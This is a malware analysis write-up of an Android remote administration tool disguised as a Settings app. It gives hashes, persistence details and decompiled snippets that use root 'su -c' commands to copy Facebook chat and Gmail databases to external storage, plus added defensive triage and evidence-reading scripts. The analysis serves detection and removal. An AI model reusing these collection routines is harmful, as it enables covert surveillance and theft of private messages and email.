Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of 8/10 (High Risk). It disguises itself as a “System Settings” app so that users are unlikely to remove it, starts as a background service, and has no visible user interface.

The package can be identified by the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

[image00: package icon]

Upon execution, the app asks the user to grant it device administrator access in order to maintain persistence on the device: an active device administrator cannot be uninstalled until that privilege is deactivated.

[image02: device administrator request prompt]


The app runs itself as a service in the background:

[image01: running services list showing the app's background service]


In the screenshot below, the second “Settings” entry is the Remote Administration Tool (RAT) app, disguised to look like the system Settings app:

[image04: two “Settings” entries in the installed application list]


The app is developed by “www.onespy.in” and signed with the following certificate:

[image03: signing certificate details]


The certificate is the Android debug certificate that the SDK generates for development builds rather than a publisher key, which is itself a useful indicator for detection. The website claims the app is “undeletable”, even after a factory data reset. In practice it can be removed: deactivate it as a device administrator, stop its service, and uninstall the package.
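The script below is an added example, not code from the original post or from Trustlook or Onespy. It turns the indicators above (package name, the two file hashes, the device-administrator registration and the staging file names the decompiled collectors write to external storage) into an offline triage of text captured from `adb shell pm list packages`, `adb shell dumpsys device_policy` and `adb shell ls /sdcard`, and emits the removal steps in the order that works (the active device admin blocks `pm uninstall`, so it is dropped first with `dpm remove-active-admin`, available from Android 7.0; on older builds deactivate it under Settings > Security > Device administrators). The three SAMPLE_* strings are constructed stand-ins for that output; the receiver class name `.DeviceAdmin` in the sample is a placeholder because the write-up does not name it, and since dumpsys layout varies between Android versions the parser keys only on the package name.

```python
# Added example (not code from the Trustlook post or from Onespy): offline triage
# of a device against the indicators given in the write-up. The SAMPLE_* strings
# are constructed stand-ins for `adb shell` output; the device-admin receiver
# class ".DeviceAdmin" is a placeholder, since the write-up does not name it.
import hashlib
import re

PACKAGE = "com.path.call"
KNOWN_HASHES = {
    "md5": "28de4b4d2e964ad25403e9c2133b2939",
    "sha256": "6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc",
}
# Staging files the decompiled FBDBSender / GMailAppDBReader code writes to /sdcard.
STAGING_PATTERNS = [re.compile(p) for p in (r"^fbdb2\.db$", r"^fb_chat\.csv$", r"^gmldbcp_.+\.db$")]

SAMPLE_PM_LIST = """package:com.android.settings
package:com.facebook.katana
package:com.path.call
package:com.whatsapp
"""
SAMPLE_DEVICE_POLICY = """Current Device Policy Manager state:
  Enabled Device Admins (User 0):
    com.path.call/.DeviceAdmin:
      uid=10087
"""
SAMPLE_SDCARD_LS = """Android
DCIM
Download
fbdb2.db
fb_chat.csv
gmldbcp_victim.db
"""


def is_installed(pm_output, package=PACKAGE):
    """True if `pm list packages` output lists the package exactly."""
    return any(line.strip() == "package:" + package for line in pm_output.splitlines())


def admin_components(dumpsys_output, package=PACKAGE):
    """ComponentName strings (pkg/class) registered as device admins for the package."""
    pattern = re.compile(re.escape(package) + r"/[\w.$]+")
    return sorted(set(pattern.findall(dumpsys_output)))


def staging_files(ls_output):
    """Names in an `ls /sdcard` listing that match the RAT's staging files."""
    names = (line.strip() for line in ls_output.splitlines())
    return [n for n in names if any(p.match(n) for p in STAGING_PATTERNS)]


def apk_hash_matches(apk_bytes):
    """Compare a pulled APK against both published hashes."""
    return {
        "md5": hashlib.md5(apk_bytes).hexdigest() == KNOWN_HASHES["md5"],
        "sha256": hashlib.sha256(apk_bytes).hexdigest() == KNOWN_HASHES["sha256"],
    }


def removal_commands(components, package=PACKAGE):
    """Order matters: an active device admin blocks `pm uninstall`, so drop it first."""
    cmds = ["adb shell dpm remove-active-admin " + c for c in components]
    cmds.append("adb shell am force-stop " + package)
    cmds.append("adb shell pm uninstall " + package)
    return cmds


def triage(pm_output, dumpsys_output, ls_output):
    """Combine the checks into one report; removal steps only if the package is present."""
    found = is_installed(pm_output, PACKAGE)
    admins = admin_components(dumpsys_output) if found else []
    return {
        "installed": found,
        "device_admins": admins,
        "staging_files": staging_files(ls_output),
        "removal_commands": removal_commands(admins) if found else [],
    }


if __name__ == "__main__":
    report = triage(SAMPLE_PM_LIST, SAMPLE_DEVICE_POLICY, SAMPLE_SDCARD_LS)
    for key, value in report.items():
        print(key, value)
```

To use it on a real device, feed the functions the output of the three adb commands and `apk_hash_matches()` the bytes of `adb pull /data/app/<path>/base.apk`; the staging-file check is worth running even when the package is already gone, since the copies on /sdcard survive an uninstall.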

The website provides a remote access panel. Depending on the subscription package purchased, the registered user can perform different functions and retrieve data from many popular apps, such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender
{
  // Copies a file as root by running "su -c cp <src> <dst>"; succeeds only if
  // su exits 0, so this whole collection path depends on the device being rooted.
  private static boolean copyDB(String paramString1, String paramString2)
  {
    try
    {
      L.l("fb copy:" + paramString1 + ";" + paramString2);
      paramString1 = "cp " + paramString1 + " " + paramString2;
      int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
      return i == 0;
    }
    catch (Exception e)
    {
      L.l(e);
    }
    return false;
  }

  // The "sender" column of Facebook's messages table holds a JSON object; this
  // pulls out its "name" field and returns "" if the value does not parse.
  private static String getName(String paramString)
  {
    try
    {
      paramString = new JSONObject(paramString).getString("name");
      return paramString;
    }
    catch (Exception e) {}
    return "";
  }

[...]

  // Copies Facebook Messenger's private threads_db2 database to external storage
  // as fbdb2.db (the CSV written later is fb_chat.csv), opens the copy
  // read-only (flag 1 = OPEN_READONLY) and reads the messages table.
  // The for (;;) loops are artifacts of the decompiler's control-flow recovery.
  private static void sendThreadsTable(Context paramContext)
  {
    if (Environment.getExternalStorageState().equals("mounted")) {
      localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
    }
    for (;;)
    {
      str = localObject + "/fbdb2.db";
      if (Environment.getExternalStorageState().equals("mounted"))
      {
        localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
        localObject = localObject + "/fb_chat.csv";
      }
      for (;;)
      {
        try
        {
          if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
          {
            L.l("fbdb copied");
            localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);
            localCursor = localSQLiteDatabase.rawQuery("SELECT sender, text, timestamp_ms FROM messages", null);
    [...]
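The following is an added example, not code from the post: it reads a staged copy of Messenger's threads_db2 the same way FBDBSender does (the same query, the same "name" extraction from the sender JSON, the same read-only open), so that a responder who recovers /sdcard/fbdb2.db from a device can see exactly which conversations were exposed. Only what the decompiled code touches is assumed to be real: a `messages` table with `sender`, `text` and `timestamp_ms` columns, `sender` carrying a JSON object with a "name" key. The sample database, its extra msg_id column, its rows and the CSV header are constructed here; run `dump_messages()` on a real recovered copy instead.

```python
# Added example (not code from the Trustlook post or from Onespy): reproduces the
# RAT's read of a staged threads_db2 copy so a responder can see what was exposed.
# Assumed from the decompiled code: table `messages` with columns `sender`
# (JSON with a "name" key), `text`, `timestamp_ms`. Everything else is constructed.
import csv
import datetime
import io
import json
import os
import sqlite3
import tempfile

MALWARE_QUERY = "SELECT sender, text, timestamp_ms FROM messages"


def sender_name(sender_json):
    """Mirror of getName(): the "name" field of the sender JSON, or "" on any error."""
    try:
        return json.loads(sender_json)["name"]
    except (TypeError, ValueError, KeyError):
        return ""


def dump_messages(db_path):
    """Run the RAT's query against a copy, opened read-only like openDatabase(..., 1)."""
    conn = sqlite3.connect("file:" + db_path + "?mode=ro", uri=True)
    try:
        rows = conn.execute(MALWARE_QUERY).fetchall()
    finally:
        conn.close()
    result = []
    for sender, text, timestamp_ms in rows:
        # timestamp_ms is milliseconds since the epoch; render as UTC for the report
        when = datetime.datetime.fromtimestamp(
            timestamp_ms / 1000, tz=datetime.timezone.utc).isoformat()
        result.append((sender_name(sender), text, when))
    return result


def to_csv(rows):
    """CSV in the shape of the fb_chat.csv staging file (the header is an assumption)."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["sender", "text", "timestamp_utc"])
    writer.writerows(rows)
    return buf.getvalue()


def build_sample_db(path):
    """Constructed stand-in for a recovered threads_db2 copy."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE messages (msg_id TEXT, sender TEXT, text TEXT, timestamp_ms INTEGER)")
    conn.executemany("INSERT INTO messages VALUES (?, ?, ?, ?)", [
        ("m1", json.dumps({"user_key": "FACEBOOK:1", "name": "Alice Example"}),
         "see you at 6", 1456000000000),
        ("m2", "not-json", "hello?", 1456000060000),  # malformed sender -> ""
    ])
    conn.commit()
    conn.close()
    return path


def demo():
    """Build the sample copy in a temporary directory and dump it."""
    with tempfile.TemporaryDirectory() as tmp:
        return dump_messages(build_sample_db(os.path.join(tmp, "fbdb2.db")))


if __name__ == "__main__":
    print(to_csv(demo()))
```

Opening the copy with `mode=ro` matters on a real artifact: a read-write open can create a journal file next to the evidence and alter its directory timestamps.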


The following code snippets are used to get Gmail data:

public class GMailAppDBReader
{
  private static final String dbnamePrefix = "gmldbcp_";

  // Locates every Gmail mailstore database as root with
  // "su -c find / -name mailstore*@gmail.com.db", then writes one "cp" line per
  // result into a second su shell so that the copies land on external storage
  // (or the app's own files directory when no SD card is mounted) as
  // gmldbcp_<account>.db. Returns the account names found. The for (;;) and
  // break constructs are artifacts of the decompiler's control-flow recovery.
  private static String[] copyDB(Context paramContext)
  {
    Object localObject3;
    int i;
    int j;
    OutputStream localOutputStream;
    try
    {
      localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
      Object localObject2 = new byte[660];
      localObject3 = new StringBuffer();
      for (;;)
      {
        i = ((InputStream)localObject1).read((byte[])localObject2);
        if (i == -1)
        {
          // one database path per line of find's output
          localObject2 = ((StringBuffer)localObject3).toString().split("\n");
          localObject3 = new String[localObject2.length];
          j = 0;
          Process localProcess = Runtime.getRuntime().exec("su");
          localOutputStream = localProcess.getOutputStream();
          int k = localObject2.length;
          i = 0;
          if (i < k) {
            break;
          }
         [...]
    // account name = the part of the path between the last '/' and the '@'
    String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf('/') + 1, ((String)localObject1).lastIndexOf('@'));
    StringBuilder localStringBuilder = new StringBuilder("cp ").append((String)localObject1).append(" ");
    if (Environment.getExternalStorageState().equals("mounted")) {}
    for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())
    {
      // destination "<dir>/gmldbcp_<account>.db" plus newline, fed to su's stdin
      localOutputStream.write(((String)localObject1 + "/" + "gmldbcp_" + str + ".db\n").getBytes());
      localObject3[j] = str;
      j += 1;
      i += 1;
      break;
    }
  }
      [...]


One special feature of the app is a remote command shell, which gives the operator access to the underlying Linux system of the Android device. The ExecShell class shown below also carries the app's root check, which resolves the su binary with /system/xbin/which; the su -c copies in the collectors above depend on that binary being present:

public class ExecShell {

    // Shell commands the class can run. The decompiler's synthetic
    // ENUM$VALUES / values() / valueOf() boilerplate is folded back into an
    // ordinary enum here; the only member is a root check that resolves the
    // su binary with /system/xbin/which.
    public enum SHELL_CMD {
        check_su_binary(new String[] { "/system/xbin/which", "su" });

        final String[] command;

        SHELL_CMD(String[] command) {
            this.command = command;
        }
    }

    [...]
}


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It combines backdoor functionality (a remote shell and root-level access to other apps' private files) with extensive data collection from messaging, mail and social apps. Sold as a monitoring tool, it is equally usable as a powerful remote control tool by criminals and malicious hackers.
